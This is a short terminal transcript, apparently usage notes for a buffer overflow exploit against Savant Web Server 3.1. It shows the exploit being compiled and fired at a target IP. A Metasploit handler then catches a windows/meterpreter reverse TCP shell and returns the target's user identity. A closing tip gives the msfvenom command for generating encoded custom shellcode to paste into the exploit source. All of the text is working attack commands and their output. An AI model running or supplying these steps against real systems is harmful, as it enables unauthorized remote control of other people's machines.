$ gcc savant-web-server-3.1.c -o savant-web-server-3.1
$ ./savant-web-server-3.1
Savant Web Server 3.1 Buffer Overflow Exploit
Usage: IP PORT
$ ./savant-web-server-3.1 192.168.0.38 80
Connected to 192.168.0.38 on port 80!
Sending payload ... OK!
Bytes delivered ... 668
$ sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.43; set LPORT 443; clear; run"
[*] Started reverse TCP handler on 192.168.0.43:443
[*] Sending stage (176198 bytes) to 192.168.0.38
[*] Meterpreter session 3 opened (192.168.0.43:443 -> 192.168.0.38:50285) at 2024-10-10 19:13:51 +0100
meterpreter > getuid
Server username: WEB-01\developer
A side note for a Meterpreter shell, ensure you generate custom shellcode and update the C source code file before compiling.
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.43 LPORT=443 -e x86/shikata_ga_nai -b '\x00' -v shellcode -f c